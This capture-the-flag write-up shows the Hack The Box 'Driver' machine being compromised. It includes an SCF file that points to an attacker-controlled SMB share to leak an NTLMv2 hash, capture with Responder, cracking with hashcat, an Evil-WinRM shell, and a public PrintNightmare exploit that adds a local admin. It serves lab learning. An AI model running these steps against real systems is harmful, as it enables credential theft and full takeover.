26 February 2022 / HACKTHEBOX, CTF, EASY Driver Write Up Overview Driver is a easy box from Hack The Box, demonstrating the impact of the Windows PrintNightmare vulnerability and also I learnt about SCF files. This was a new attack vector for me. Nmap I deployed the machine and was given the target IP 10.10.11.106. I started a NMAP scan to check the available ports. └──╼ $sudo nmap -sC -sV -oA nmap/initial 10.10.11.106 Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-27 17:20 GMT Nmap scan report for 10.10.11.106 Host is up (0.020s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-auth: | HTTP/1.1 401 Unauthorized\x0D |_ Basic realm=MFP Firmware Update Center. Please enter password for admin | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: Site doesn't have a title (text/html; charset=UTF-8). 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2022-02-28T00:20:49 |_ start_date: 2022-02-27T04:55:51 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 51.89 seconds 3 Ports open: 80 - HTTP - Microsoft IIS httpd 10.0 135 - MSRPC - Microsoft Windows RPC 445 - SMB - Microsoft Windows 7 - 10 microsoft-ds I also ran a full port scan and found winrm to be open on port 5985. └──╼ $sudo nmap -p- -oA nmap/all_ports 10.10.11.106 Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-27 17:25 GMT Nmap scan report for 10.10.11.106 Host is up (0.026s latency). Not shown: 65531 filtered ports PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 445/tcp open microsoft-ds 5985/tcp open wsman The web service is showing an unauthorized response however it could be leaking a username with the message “Please enter password for admin”. Enumeration Before looking at the web service I tried enumerating SMB with various tools such as smbmap, smbclient and CrackMapExec however I had no joy. └──╼ $cme smb 10.10.11.106 SMB 10.10.11.106 445 DRIVER [*] Windows 10 Enterprise 10240 x64 (name:DRIVER) (domain:DRIVER) (signing:False) (SMBv1:True) ┌─[daz@parrotos]─[~/Documents/HackTheBox/Driver] └──╼ $smbmap -H 10.10.11.106 [!] Authentication error on 10.10.11.106 So I turned my attention to the web service. Navigating to the IP I did get a login prompt. I tried admin:admin and got in! Once logged in, I get a simple web page but an email address of ‘firstname.lastname@example.org’. I updated my host file with ‘driver.htb’ just in case I need it later. The only link that works on the web page is ‘Firmware Updates’. This page provides an upload function. I played around with this for such a long time, trying attacks like XSS, uploading PHP shells but nothing worked. However re-reading the line: Select printer model and upload the respective firmware update to our file share. Our testing team will review the uploads manually and initiates the testing soon. I decided to change my google search to “http smb file share exploit” and found an article on using SCF files. Initial Access The first article that returned was from Penetration testing lab https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/. After reading the article I created the file test.scf using the example they provide and changed the IP to my VPN IP. └──╼ $cat test.scf [Shell] Command=2 IconFile=\\10.10.14.11\share\pentestlab.ico [Taskbar] Command=ToggleDesktop I started responder with the command ‘sudo responder -I tun0’. Then uploaded the file using the web upload function and got a hit from responder [SMB] NTLMv2-SSP Client : 10.10.11.106 [SMB] NTLMv2-SSP Username : DRIVER\tony [SMB] NTLMv2-SSP Hash : tony::DRIVER:87ea6d299d14fa32:ED6355EFB0444E974805B3FF0E0B9B26:0101000000000000803021AB042CD801AE67B0D5B0D050060000000002000800350054003400480001001E00570049004E002D0 0350032003700430037004C004F004F0030004300360004003400570049004E002D00350032003700430037004C004F004F003000430036002E0035005400340048002E004C004F00430041004C000300140035005400340048002E004C004F004 30041004C000500140035005400340048002E004C004F00430041004C0007000800803021AB042CD80106000400020000000800300030000000000000000000000000200000C974CDC12A32C5BFD81B375A1DECF3BF2FF300E27CB3440A6AC953C 7F84AACEA0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0031003100000000000000000000000000 I put the hash in to a file called ‘hash’ and used hashcat to crack it with the command hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt. Now I had a username and password I was able to use winrm to login. To login I used Evil-WinRM. └──╼ $/opt/evil-winrm/evil-winrm.rb -u tony -i 10.10.11.106 Enter Password: Evil-WinRM shell v2.4 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\tony\Documents> Priv Esc Now I had a foothold, I did some basic enumeration of the box. Looking at the running services I could see the Windows print spooler service. 381 23 5164 14448 ...12 1128 spoolsv This made me think of the PrintNightmare exploit. I could also have used rpcdump to find this. └──╼ $rpcdump.py 10.10.11.106 | egrep 'MS-RPRN|MS-PAR' Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol Protocol: [MS-RPRN]: Print System Remote Protocol To exploit this I used the exploit created by Caleb Stewart and John Hammond. I used git to clone the repo in to my /opt directory. └──╼ $sudo git clone https://github.com/calebstewart/CVE-2021-1675.git Cloning into 'CVE-2021-1675'... remote: Enumerating objects: 40, done. remote: Counting objects: 100% (40/40), done. remote: Compressing objects: 100% (32/32), done. remote: Total 40 (delta 9), reused 37 (delta 6), pack-reused 0 Receiving objects: 100% (40/40), 131.12 KiB | 932.00 KiB/s, done. Resolving deltas: 100% (9/9), done. ┌─[daz@parrotos]─[/opt] └──╼ $cd CVE-2021-1675 ┌─[daz@parrotos]─[/opt/CVE-2021-1675] └──╼ $ls CVE-2021-1675.ps1 nightmare-dll README.md Now using Evil-WinRM I can upload the powershell script and execute it. *Evil-WinRM* PS C:\Users\tony\Documents> upload /opt/CVE-2021-1675/CVE-2021-1675.ps1 Info: Uploading /opt/CVE-2021-1675/CVE-2021-1675.ps1 to C:\Users\tony\Documents\CVE-2021-1675.ps1 Data: 238080 bytes of 238080 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\Users\tony\Documents> Import-Module C:\Users\tony\Documents\CVE-2021-1675.ps1 *Evil-WinRM* PS C:\Users\tony\Documents> Invoke-Nightmare [+] using default new user: adm1n [+] using default new password: P@ssw0rd [+] created payload at C:\Users\tony\AppData\Local\Temp\nightmare.dll [+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll" [+] added user as local administrator [+] deleting payload from C:\Users\tony\AppData\Local\Temp\nightmare.dll It worked! I canceled my current WinRM session and logged back in using the new credentials. *Evil-WinRM* PS C:\Users\tony\Documents> exit Info: Exiting with code 0 ┌─[daz@parrotos]─[~/Documents/HackTheBox/Driver] └──╼ $/opt/evil-winrm/evil-winrm.rb -u adm1n -i 10.10.11.106 Enter Password: Evil-WinRM shell v2.4 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\adm1n\Documents> cd C:/Users/Administrator/Desktop *Evil-WinRM* PS C:\Users\Administrator\Desktop> dir Directory: C:\Users\Administrator\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 2/26/2022 8:56 PM 34 root.txt *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt Thats the box, thanks for reading! ========================================================================== Any comments or feedback welcome! You can find me on twitter.